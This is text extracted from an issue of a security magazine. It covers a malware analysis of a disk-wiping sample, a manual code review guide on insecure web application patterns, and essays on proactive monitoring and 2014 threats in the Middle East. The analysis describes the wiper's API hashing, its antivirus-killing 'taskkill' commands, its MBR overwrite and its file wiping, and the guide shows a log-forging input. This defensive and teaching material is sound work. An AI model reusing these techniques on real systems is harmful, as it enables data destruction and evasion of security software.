510f83af3c41f9892040a8a80b4f3a4736eebee2ec4a7d4bfee63dbe44d7ecff

49 / 56 virus total

Static analysisThe sample imports only two dlls (kernel32, ntdll) these are mandatory libraries which are loaded by most of the executables and doesn’t give a hint about the functionality of the sample.But kernel32 library contains functions that allow any executable to load libraries not in the import table, these functions are (LoadLibrary , GetProcAddress )simply the technique works as follow :1. First the executable sends the name of the required library as an argument to LoadLibrary function which returns a handle to the loaded module if it succeeded.2. When the library is successfully loaded in memory the executable then calls GetProcAddress function with the required function in the loaded library and the module handle as arguments.3. Then the executable can call the function using the address which was returned by GetProcAddress function.This technique is used to hide the functionality of the malware, as it cannot be seen during static analysis, especially if the names of the library and the function are obfuscated or encrypted.

Dynamic analysisThe code starts with unusual non malicious code-the third instruction calls the fourths instruction and the address saved by the call function which is the address of the fourth instruction is put in EAX.The code then enters a loop to calculate some addresses and store them in the memory (calculating the addresses at runtime hides information from static analysis as the addresses called are not known until the sample is running).The sample calculates 27 addresses and are stores them in memory starting from memory location 004026CC.The code then calls one of the 27 addresses (004023A0).

This function access the FS segment register to reach the TEB.TEB is the thread environment block which contains information about the current running thread.The structure of the TEB is not documented by Microsoft, nevertheless the information we need is available online [http://www.nirsoft.net/kernel_struct/vista/TEB.html].The function accesses offset 0x30 in the TEB, so we need to know what is at this offset-The first member is a struct (NT_TIB). .This struct contains 6 pointers (every data type starts with P is a pointer). .Pointers in 32 bit executables have size of 4 bytes. .It also contains a union, unions allocate the biggest size of its members, it contains an unsigned long and a pointer both of size 4 bytes. .so the total size of NT_TIB struct is 7 * 4 = 28 bytes

- Then there is another 5 pointers (two inside CLIENT_ID structure) of size 5*4 = 20 bytes.

20+28 = 48 bytes (0x30).

So the offset 0x30 in the TEB is the Peb according to the unofficial documentation.

The function then accesses the offset 0x0C in the PEB structure (documentation of the structure can be found here)

The member at offset 0x0C is PPEB_LDR_DATA, a pointer to PEB_LDR_DATA structure

Then offset 0x14 in the PEB_LDR_DATA which is a pointer to InMemoryOrderModuleList which is a linked list of LDR_DATA_TABLE_ENTRY elements.

Offset 28 in this structure is not documented but it seems that it gets the name of the loaded module.Then there is a loop that processes the module name to calculate a hash value that is compared with a hardcoded value after the loop.

This loop will search for the entry point of kernel32.dll (the calculated value matches the hardcode value) and then the function will return this address.

Then the function at 0x004023DD is called twice, to find the address of LoadLibraryA , GetProcAddss functions.

Then it will load dlls using the LoadLibraryA function, and find the addresses of the following functions using the function at 0x004023DD:

1. advapi32.OpenProcessToken2. advapi32.LookupPrivilegeValueA3. advapi32.AdjustTokenPrivileges4. kernel32.OpenFileMappingA

https://msdn.microsoft.com/en-us/library/windows/desktop/aa813706(v=vs.85).aspx


5. kernel32.CreateFileMappingA6. kernel32.GetWindowsDirectoryA7. kernel32.InitializeCriticalSection8. kernel32.CreateThread9. kernel32.WaitForSingleObject10. ntdll.RtlLeaveCriticalSection11. kernel32.GetVersionExA12. kernel32.Sleep13. kernel32.GetDriveTypeA14. ntdll.RtlEnterCriticalSection15. kernel32.FindFirstFileA16. kernel32.RemoveDirectoryA17. kernel32.FindNextFileA18. kernel32.FindClose19. kernel32.CreateFileA20. kernel32.WriteFile21. kernel32.CloseHandle22. kernel32.DeleteFileA23. kernel32.SetFilePointer24. kernel32.GetSystemDirectoryA25. kernel32.GetDiskFreeSpaceA26. kernel32.GetDiskFreeSpaceExA27. kernel32.ReadFile28. kernel32.WinExec29. kernel32.GetCurrentProcess30. ntdll.RtlGetLastWin32Error31. kernel32.LoadLibraryA32. kernel32.GetProcAddress

Then loads msvcrt.dll1. msvcrt.strcat2. msvcrt.memset3. msvcrt.strcpy4. msvcrt.memcpy5. msvcrt.strlen6. msvcrt.sprintf7. msvcrt.strcmp8. msvcrt.malloc9. msvcrt.freeThen user32.dlluser32.ExitWindowsExThe function starting at 0x004011BC tries to open a file mapping object named “JO840112-CRAS8468-11150923-PCI8273V”, if it is found the malware will exit.If it didn’t find the file mapping object, it will create one.Then the malware will send the following commands to kernel32.WinExec in order to be executed on the systema. taskkill /F /IM pasvc.exe , which belongs to http://us.ahnlab.com/b. taskkill /F /IM clisvc.exe , which belongs to ViRobot ISMS from HAURIThe function call at 00401242, checks the version of the windows system if it is older than windows vista (windows XP or windows 2003 or older) the malware will create a thread that starts execution at 0x00401AA0 otherwise it will start execution at 0x004012D5.

On windows XP.Function call at 00401d85 clears a buffer of size 0x104 bytes and the stores the string “\\.\PhysicalDrive0 ” in the buffer.then opens the file \\.\PhysicalDrive0 and uses kernel32.SetFilePointer function to point to the start of the drive,it then reads 512 bytes to a buffer in the heap and the it uses setFilePointer() to advance the file pointer by 0x7000 bytes.Then it starts writing 512 bytes of the word “PR!NCPESP” ,and then sets the file pointer to the beginning of the physical drive and writes again 512 bytes of the word “PR!NCPESP”.It loops to do the same on PhysicalDrive 1 to 9The malware will sleep for 5 minutes and then will shut down the operating system for the last time.

On operating systems newer than windows XP -Windows 7 for example- the malware creates another thread after destroying the MBR this thread is responsible for deleting files and folders on the hard driveThis thread works as follows:

1. it will loop to check all drives from B:\ to Y:\ if it is the drive exists, it will perform another check to see if it is the drive that contains the operating system or not. a. If it contains the operating system then it will store the drive path for usage after the current loop. b. If it is not the drive of the operating system it will process the drive in the loop.2. The processing of the valid drives is the same for the drive that contains the operating system and the other valid drives, the only difference is that the malware will create a new thread for every valid drive and will process the drive that contains the operating system on the current thread.3. The processing done on drives (function at address 0x004015ED) is that the malware will traverse the folders in the drives, using findNextFile() method and appends *.* to the current directory path.4. It overwrites the content of every file with the word “PR!NCPESP” multiple times , and then deletes the file ,making file recovery impossible.5. It avoids deleting files in c:/program files, c:/program data, and c:/windows.6. it will create a thread for deep paths (3 nested folders )

After five minutes of the malware will shut down the PC using the following methods:1. kernel32.WinExec(“shutdown -r -t 0”)2. user32.ExitWindowsEX()


Revi

ews

Code Review

Finding vulnerabilities in any application is a daunting task of a security researchers, these researchers are increasingly engaging with different approach and methodology to hunt down vulnerabilities. Some of the common approach or methodologies are black box testing and white box testing.Black box testing approach is when researcher doesn’t have any working knowledge and background of the application, they have to do enumeration of technologies, mapping of the application and identification of fault entry points, determining input validation vulnerabilities, or logical security vulnerabilities.White box testing involve having source code of the application and having proper understanding of the application as well as its purpose, background, environment and framework to best identify key areas of focus.In software development, a small coding error can result in a critical vulnerability that ends up compromising the security of an entire system or network.Source Code review is probably the single-most effective technique for identifying security flaws. When used together with automated tools and manual penetration testing, code review can significantly increase the cost effectiveness of an application security verification effort.This task can be carried out either by some commercial as well as free automated tools or manually review of the code which requires human interaction.

Manual Source Code ReviewOverview

ww

w.b

luek

aize

n.or

g

Shaikh RashidCyber Security Consultant and

Security Researcher


IntroductionManual source code review provides insight into the “real risk” associated with insecure code. This is the single most important value from a manual approach. A human reviewer can understand the context for certain coding practices, and make a serious risk estimate that accounts for both the likelihood of attack and the business impact of a breach,Manual source code review is a time taking process but this lengthy process can be shortened up if we know properly which areas to investigate. Although many tools are available but still proper knowledge of manual code review is required

BasicsThe first and foremost requirement of Code Review is that you should have basic understanding of at least one Object Oriented Framework i.e. J2EE, .net. Knowledge of PHP is also fine.Application DetailsThe next and most important step is to understand how the application is working what are the settings in it. Therefore entry point of code review will be deployment descriptor (web.xml in J2EE, web.config in .NET). In web service testing it’s very important to understand the application, what it is doing, what are the business requirements? Analyze behavior of application. Have an idea of data flow. Explore about application and mine out important details such as APIs, libraries used.Note: In PHP there is no configuration file present if no framework is used.

Following is the checklist for code review:•Authentication & Authorization•Cryptography•Respecting boundaries (input validation & output encoding)•Session management•Threat Modeling Terminology•Following are the terminology, which a code reviewer should be aware of,•Trust zone: User of application•Taint: User provided malicious data •Taint propagator: The function taking malicious data as input and without validation passing it out•Source: The point where malicious input was given e.g. request.getparameter() is source•Sink: The place where vulnerability gets executed example the place where xss alerts get reflected

1.Configuration ManagementStudy the configuration file (deployment descriptor) properly it will depict a lot about deployment. For example you want to see what HTTP methods are used you can see it in web.xml. In WEB-INF→web.xml is present on viewing it we found the setting as shown in Figure 2.

2.Check out Whether Custom Error Pages are Defined:If the application developer wants, so he can set a custom error page for error code in web.xml as shown in Figure 1

Figure 1: Use of custom pages for error code 404

Figure 2: Use of dangerous HTTP methods

Figure 3: Transport-guarantee not set properly

RemediationProvide a custom error page to avoid leakage of sensitive information.Disable dangerous HTTP methods. Use Get and Post methods to be on a safer side.

3.Listing of HTTP Methods Enabled Under HTTP-method tag you can see the methods enabled (refer Figure 2)

4.Data Protection in Storage & TransitThe setting in Figure 3 shows that transport guarantee is none which means that there is no HTTPS setting provided in the application. So, anybody can intercept the communication.

RemediationThe setting for transport guarantee should be confidential as shown in Figure 4.


Figure 4: Transport-guarantee setting should be Confidential

Figure 5: SafePass variable storing encrypted value of password

Figure 7: Password hard coded as comment

Figure 8: ‘User ID’ passed as hidden parameter.

Figure 9: Code for updating profile

Figure 6: SHA for password hash

5.Hashing of PasswordA weak hashing algorithm was used for password i.e. SHA1. If you see the code as shown in Figure 5 it seems there is encryption of password (Figure 5), but on opening up of definition of encrypt method of crypto class (Figure 6) we can see hashing of password is done by using SHA, but which SHA algorithm is used that is not known.

If in instance of messagedigest.getinstance SHA is given then it takes SHA1 by default, the same is happening in this case refer Figure 6. SHA1 is a weak hashing algorithm.

RemediationA strong hashing algorithm should be used to store password in hashed form. There should be a proper salting of hashed data. The salt used should be different for different user. If you are using some encryption algorithm them they should be strong enough. In coming years if computation resources become cheaper then it may be possible to crack the encryption. Therefore for delaying attacker from decrypting your data you can increase number of iteration of encryption algorithm.

6.Hard Coded Password Case.Sometimes developers put hardcoded password in JSP page as comments. In Figure 7 first comment (red marked as 1) is of JSP another is of HTML (marked as 2). The HTML comment is visible on web page (since it is a JSP page so HTML comments won’t work). Even the JSP comments can be viewed by view source

7.AuthorizationThe case of CSRF (bypassing authorization):‘My profile is better than you because I have updated it’Sometimes developers have a wrong notion that sending parameters/ session token as a hidden field or obscuring with programming terminologies would save them from eyes of attacker. An example of it can be depicted in following fig (refer Figure 8).

There is a code for updating of accounts as shown in Figure 9.

The code in the Figure 9 would update an account on basis of ‘userid’, which is a crucial parameter passed as hidden parameter. This coding flaw can be used by an attacker who would make his own webpage having same action of update as that of application; he will also have victim’s session ID,


Figure 10: User ID getting passed as cookie

Figure 12: Logging of password in plaintext

Figure 11: Use of blacklisting

Figure 13: Creation of a malicious class by attacker

which would update profile of victim. The cause of this attack is a weak authorization process which is updating data on basis of a parameter without validating whether the parameter is coming from a legitimate user or not

Remediation:Use tokens which would help server in identifying its client.In spring framework 3.0 there has been token remedy for CSRF

8.Bypassing authentication:In Figure 10 you can see the session token’s value is stored in a hidden field, which can be easily retrieved by MITM. An attacker can use session token of victim to bypass authentication process and gain an access to the victim’s profile.

Remediation:Care should be taken that proper session management is followed. The session token should expire after some time. The session token should be random and long sequence, they should be difficult to guess. The cookie attributes should be properly set.

9.Data Validation: Improper Input Validation.Sometimes many developers use blacklisting technique, which is not a good practice, consider the code displayed in Figure 11. You can see a blacklisting list provided by developer. He is blacklisting script pattern, JavaScript pattern, eval, onload but he has not included onmouseover and many other attack vectors in the list.

Remediation:Why not to use white listing? If I am providing validation of phone number textbox then why should I say don’t allow alphabets, special characters instead I can say allow only numbers. Isn’t it simple? Just tell what is valid.

Another recommendation given by presenter was to remove the burden of validation from developer and put it on secure Frameworks such as spring or some secure APIs. Nowadays there are various APIs and framework available to do the job of input validation and output encoding.

10.Logging & Auditing:Improper Logging Technique: In the below given Figure 12 we can see that the password is logged in as plaintext.

Log ObfuscationAnother possible scenario can be:User ‘Ak’ logged in at 2:46pm‘Ak’ is coming as a user input. This logging technique can be used as a tool by attacker by giving input as ‘AD logged in at 2:40pm User Ak’ so the logging string will form as –User ‘AD logged in at 2:40pm User Ak’ logged in at 2:46 pmThis will help to cover the tracks of attacker by forging up the logs.

Remediation:The logging should not contain elements coming from user as input, as he can obfuscate the logs by giving malicious input in order to mask his activities.A password should never be logged as plain text.

11.Improper Use of Reflections:What is reflection?Reflection is the ability to examine or modify the properties or behavior of an object at runtime.

Scenario of attack:I am a disgruntled employee, I am resigning, but I have been so much frustrated with my job that I have an intention to harm company without getting caught by logging of application. I create the page as shown in Figure 13.


In Figure 13 you can see that a class ‘ReflectionandMore‘ is created which has a constructor defined. In the definition of constructor a connection to database is formed and the next step is deletion of some table. This class is not called anywhere in application ,therefore when you run code review tool on it, the tool will not consider it as malicious code and leave it marked as a dead code.Here comes the attack by using reflection as a medium, refer Figure 14. In the figure you can see that the reflection is creating instance of class which is provided as user input(s). So attacker will call this code (Figure 14) and give the malicious class (Figure 13) as input. Thus when the constructor is called, a JDBC connection is made and this will ultimately lead to deletion of table

Figure 14: Reflection to call the constructor of malicious class

Figure 15: URL not getting validated

Remediation:The application should have an authorization check for performing activities such as deletion or manipulation of database. It is suggested that re-authentication should be prompted before performing such action.

12.URL Redirection Case:There are cases when developers make use of a good output encoding mechanism that is c:out to escape injections but sometimes some remedies are applicable for some attacks only. In this case URL has been taken as input of ‘GET’ request parameter by application (refer highlighted section of Figure 15). Even if a developer used quite a good mechanism to escape XSS types of attacks but he forgot to put a check on URL redirection, in such a case an attacker can give URL of his phishing site as input to get request parameter. The resulting URL will be given to victim thus misguiding a legitimate user.

Remediation:Assume all input is malicious. Use an “accept known good” input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page. When the set of acceptable objects, such as file names or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual file names or URLs, and reject all other inputs.

Figure 16: Using open relay SMTP server

13.SMTP Server Spamming Case:It is worse to provide hardcoded password of SMTP in code but it is worst case to have no password defined for SMTP server. If anyhow attacker comes to know of it he can use this vulnerability of victim server to spam some other parties’ mail box here web application hosting server will become a medium of attack.In the below given figure we can see that mail is getting send by using open relay SMTP server. Open relay allows anyone on internet to send mail. They are really unpopular as they can be exploited by spamming.

Remediation:Provide a strong password for SMTP server, which should not be hardcoded.


ww

w.b

luek

aize

n.or

g

Best

Pra

ctic

e

Defining a Proactive Security Monitoring Strategy

An information security professional with 20+ years private sector experience specializing in the development and implementation of world class incident response programs, investigations and cyber threat intelligence programs. Harris is currently the leader for incident response and cyber threat intelligence for Safeway, Inc., one of the largest grocery retail companies in North America

About The Author

Harris D. SchwartzSafeway Corporate Information

SecurityLead, Incident Response & Cyber

Threat Intelligence


As the realm of cyber security threats continue to change, trend, increase and become targeted in some instances, it’s important for companies to modify or change their defense strategy in alignment with industry trends. In the 20+ years in the corporate and information security industry, working proactively has far better advantages then sitting around and waiting for something to happen. There are still companies today that choose the reactive route because their mindset is either stuck in an old culture that has worked the last number of years or they choose not to know what is happening in their networks and environmentIn some cases, moving from an entirely reactive state to a proactive approach may still have its internal challenges with peers, your legal department and other groups within the company. It is important as security professionals in a corporation to constantly educate and build awareness with your peers and stakeholders, especially executive leadership and your legal department. When you have built the perfect relationship, or partnership, you will find that they will approach you and ask for your recommended strategy moving forward; essentially as a subject matter expert. It is unfortunate that too many times, I have found peers afraid or scared of their executives or legal professionals. If this happens, making important decisions for your company will take time and by the time you get around to accomplishing what you need to, it will be too late.

So what do I consider to be reactive vs. proactiveIt is important to operate a SIEM (security information and event manager) tool where all of your various IT appliances and tools (firewalls, IDS/IPS, etc.) send their logs for alerting purposes. Most SIEM infrastructures conduct aggregation and correlation of these logs, and coupled upon further rules, signatures and threat intelligence, can alert your security operations staff about notable security events on your network, which would then require an analyst to review, assess, triage and remediate as necessary. Every company will have reactionary response to events in this nature. This model has been the norm for a long time, and is simply not enough to ensure your network is free of attackers and unauthorized individuals. In some companies and organizations, the security team manages the SIEM 100% while others may augment staff with an MSSP – Managed Security ServicesWhat else is necessary in today’s modern cyber world?

The other 80% of the rule is the proactive approach. What does proactive really mean? It could have different definitions from one person to another. I have always been a fan and proponent of proactive operations. This is one advantage to getting to know, on an intimate scale what is normal activity on your network and plainly, what is not normal. All the small, medium and large scale abnormalities, anomalies and unknowns of the network. How else to figure out what is normal and not, is to dig into your network activity, utilize various technology tools and applications to help supportproactive monitoring, run down all anomalies and suspicious

activity, conduct heightened monitoring activity surrounding critical operations and systems in your enterprise, get to know the system administrators and ask questions.I will give you an example. My team was using a known monitoring tool to keep an eye out for any outbound traffic that was deemed suspicious or out of the norm, e.g. beaconing traffic from an internal host to external host or between two internal hosts. This type of activity could be evidence of an internal hoist infection talking to a command and control botnet or other malicious IP address. In this particular example, traffic was communicating between two different internal hosts and some of the traffic was attempting to access a privileged account. In the end, the investigation determined that the although there was traffic between the two hosts, the access attempt to the privileged account was blocked, and on top of it all, the entire event identified known network backup activity that occurs on the network late at night. These were circumstances we didn’t know about, but now we do

Why else is proactive monitoring important?

Well, if your company or entity is one that deals in sensitive information, whether that being nation state

secrets, customer personal information (what we call PII in the Americas), credit card and payment data (PCI) and/

or patient and medical data (ePHI). This information in the wrong hands can cripple your company and business, cost you millions, damage your reputation in seconds and

bring all sorts of legal troubles to your executives and board members. Proactive monitoring along these lines should be a combination of technology (tools and applications) and human interaction and surveillance of your network

environment.

Let’s face it, breaches and incidents typically occur when a company least expects. Industry trends showed that most attacks occurred Friday to Sunday, now attackers

are taking different approaches to attacks and breaches. While they are deploying malicious code that operates in

stealth mode, they still have to exfiltrate your data, in slow and steady moves so that the activity is not “detectable”. This is why security professionals need to take a different

stance with regard to cyber security – “Always under attack” or “Imminent Danger” – being aware and proactive will

allow companies to observe, identify, prevent and mitigate cyber threats much faster than if they operated in a 100%

reactionary stance.

In maintaining a proactive strategy also requires good relationships and partnerships among your peers, support groups and stakeholders within your organizations. If you

haven’t started building those relationships yet, you should start as soon as you can. The days of keeping to ourselves

and within a silo is well over. This approach won’t help but will hinder your efforts. Building a notification list of important people to contact in the organization will only

assist in your proactive efforts, and afford you the ability to respond quickly to a real live security incident.


ww

w.b

luek

aize

n.or

g

Best

Pra

ctic

e

Senior Consultant (IS/IT)

Information Security Is aChallenge in The Middle East

10 years of experience in Information Security and Technology. Majorly working with ministries and authorities of Oman. Expert in Information Security Audits, Security Assessments and Digital Forensics

2014 has passed and we have just entered into 2015. If you look 2014 from the prospective of Information Security, the picture is a bit scary. Heartbleed and ShellShock gave surprises to everybody. Giant corporates and big empires spent a lot of man days in evaluation, risk assessments, patching and other activities to make sure their information is secure. Another surprising and shocking thing was the discovery of critical vulnerabilities in OpenSource. These vulnerabilities impacted whole computing world. And then, there were cyber-attacks, whether it is US-China cock-fight/cyber war, its Chinese Vs Russian Hackers, stories of Syrian Cyber Army, “Big Achievements of Anonymous Group” and other hacking incidents have made 2014 a memorable year.

About The Author

2014 Security Recap

Abdul Rehman


According to the IBM Cyber Security Intelligence Index, an average large company had to filter through 1,400 cyber-attacks weekly to identify the 1.7 incidents that can do harm

Hackers attracted towards Middle EastApart of the well-known names in Cyber-Space like US, China Russia etc, number of cyber-attacks has increased in Middle-East region in 2014. And it will continue to increase in 2015 as well due to many obvious reasons. A sample of 30 of the world’s largest Fortune 500 companies generated visitor traffic to websites that host malware, with a sharp rise in malware attacks on the Middle East’s oil and gas sector.Various websites of KSA, Oman and UAE were publically defaced in 2014. As the business opportunities are growing in Middle-East region, it means more complex security threats. Businesses across the Middle-East are at high risk, with 65% of the employees having no awareness about information security, Cisco’s recent Middle-East ICT Security Study says.

http://me.kaspersky.com/en/about/news/virus/2014/the-number-of-cyber-threats-in-the-Middle-East-continues-to-grow

Kaspersky Lab also presented statistics for the Middle East in the first quarter of 2014. The Kingdom of Saudi Arabia has the highest total number of local and online malware detections, closely followed by the United Arab Emirates. Bahrain and Lebanon were the safest countries, according to these statistics, with the region’s lowest threat levels.

http://me.kaspersky.com/en/about/news/virus/2014/Kaspersky_Lab_reports_on_cyber_threats_in_the_Middle_East_in_the_first_quarter_of_2014

Moral of the StoryInformation Security should be a board room discussion in 2015. Sheer planning initiatives need to be taken from the top in both government and business sectors. Information Security should not be considered as IT Security only. Steps should be taken for Information Security awareness among the employees.

Points to PonderIt should be made clear this year that information security is critical to today’s business and any compromise on information assets can damage organizations. The key initiative is effective enterprise-wide risk management and awareness. Identify what information needs to be protected? What are the possible risks to your information and how much risk can you accept? What security measures do you need? Do the security measures work after implementation? Be a hard target to exploit and learn from the mistakes which you have made in 2014. May the God of all SECURITY be with you

An annual report by TrendMicro (A security Software Company) says, the top threat in Middle-East is adware, while email reputation queries, also known as spam email, totaled 24million in the third quarter (Q3) of 2014, including 14 million in Saudi Arabia, 8 million in the UAE, and 2 million in the rest of the Middle East. The region had 1.5 million malware detections in Q3 2014, with online banking malware, ransomware, and malicious websites and mobile apps presenting high risk. According to the report, targeted attacks campaigns will continue to multiply in 2015, after cybercriminals had noteworthy breaches via targeted attacks in the US.As per another report by Kaspersky, altogether in first quarter of 2014 in the Middle East Kaspersky Lab products neutralized more than 34.9 million cyber-attacks and malware infections

on computers and mobile devices, representing an increase of almost 10% year-on-year (2013’s figure was 31.6 million).

security kaizen magazine, issue 18

Documents